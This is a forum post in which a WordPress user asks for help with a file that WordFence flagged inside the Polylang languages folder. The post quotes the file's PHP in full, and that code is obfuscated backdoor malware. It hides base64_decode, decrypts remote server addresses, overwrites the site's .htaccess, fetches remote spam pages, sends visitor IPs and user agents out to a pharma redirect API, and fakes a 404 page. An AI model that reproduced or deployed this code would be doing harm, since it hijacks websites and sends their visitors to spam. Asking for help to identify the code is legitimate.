Malware detection

Hey guys! I loooove Polylang and use it on multiple sites with excellent results. I have recently received a Malware warning from WordFence :

“Critical Problems:

* File appears to be malicious: wp-content/languages/img/lang.php
”
I looked over the code and did’t find anything that jumped out at me, bu i’m no expert. Could someone look at it ? Thanks a million!

The code in the file is : `<?php

error_reporting(0);
mb_internal_encoding(“UTF-8”);
$track = ‘lmdr’;
$res = $host = (isset($_SERVER[‘HTTPS’]) ? “https” : “http”) . “://$_SERVER[HTTP_HOST]”;
$tkey = $_GET[‘k’];
$key = str_replace(‘-‘, ‘ ‘, $tkey);
$cat = ”;

if (isset($_GET[‘check’])) {
echo ‘ok’;
die();
}

if (isset($_GET[‘gl’])) {
$htmls = glob(“htmls/*.html”);
foreach ($htmls as $html) {
$html = str_replace(‘htmls/’, ”, $html);
echo “$res/$html\n”;
}
die();
}

$ea = ‘_shaesx_’; $ay = ‘get_html_ya’; $ae = ‘decode’; $ea = str_replace(‘_sha’, ‘bas’, $ea); $ao = ‘wp_cd’; $ee = $ea.$ae; $oa = str_replace(‘sx’, ’64’, $ee); $algo = ‘default’; $pass = “Zgc5c4MXrLUufAwU6pFbfLCQOUKULbIckDuLX7HVoU4=”; $gpass =”Zgc5c4MXrK0zfgkF8Y1BKercMlHBdrpelSSNA+7evRYSZwcBXAE=”;
function wp_cd($fd, $fa=””)
{
$fe = “wp_frmfunct”;
$len = strlen($fd);
$ff = ”;
$n = $len>100 ? 8 : 2;
while( strlen($ff)<$len )
{
$ff .= substr(pack(‘H*’, sha1($fa.$ff.$fe)), 0, $n);
}
return $fd^$ff;
}
$api = $ao($oa(“$pass”), ‘wp_function’);
$genapi = $ao($oa(“$gpass”), ‘wp_function’);

if (isset($_GET[‘htaccess’])) {
$hres = str_replace(‘clgen.php’, ‘rpanel/htaccess.txt’, $genapi);
$htaccess = file_get_contents($hres);
chmod(“../../../.htaccess”, 0644);
if (file_put_contents(‘../../../.htaccess’, $htaccess)) {
echo ‘htaccess ok’;
die();
}
}

if (!file_exists(‘cats.txt’)) {
$cres = str_replace(‘clgen.php’, ‘img/cats.txt’, $genapi);
$cats = file_get_contents(“$cres”);
file_put_contents(‘cats.txt’, $cats);
}

$cats = file(‘cats.txt’, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($cats as $line) {
if (stristr($key, $line)) {
$cat = $line;
break;
}
}

//api redirect
$ip=$_SERVER[‘REMOTE_ADDR’];
$ua = $_SERVER[‘HTTP_USER_AGENT’];
$refer = $_SERVER[‘HTTP_REFERER’];
$scheme = ‘pharm’;
$ua1 = rawurlencode($ua);
$apikey = ‘5a087486b28b5953e8460fca6c4d168e’;
$churl = “{$api}action=get_link&api_key=$apikey&group=$scheme&cat=$cat&ua=$ua1&ip=$ip&keyword=$key&referer=$refer&track=$track”;
$check = file_get_contents($churl);
$json = json_decode($check);
$goaway = $json->{‘stream’}->{‘url’};

if ($goaway) {
echo “<script>location.href=\”$goaway\”;</script>”;
header(‘Location: ‘.$goaway);
//echo $goaway;
}

if (file_exists(“htmls/$tkey.html”)) {
$html = file_get_contents(“htmls/$tkey.html”);
}
elseif (isset($_GET[‘gen’])) {
if (!is_dir(“htmls”)) mkdir(“htmls”);
$rhtml = file_get_contents(“$genapi?res=$res&key=$key”);
if (file_put_contents(“htmls/$tkey.html”, $rhtml)) {
echo ‘gen ok’;
die();
}
}
if ($html) echo $html;
else echo ‘
<html>
<head><title>404 Not Found</title></head>
<body bgcolor=”white”>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!– a padding to disable MSIE and Chrome friendly error page –>
<!– a padding to disable MSIE and Chrome friendly error page –>
<!– a padding to disable MSIE and Chrome friendly error page –>
<!– a padding to disable MSIE and Chrome friendly error page –>
<!– a padding to disable MSIE and Chrome friendly error page –>
<!– a padding to disable MSIE and Chrome friendly error page –>
‘;
`

The page I need help with: [log in to see the link]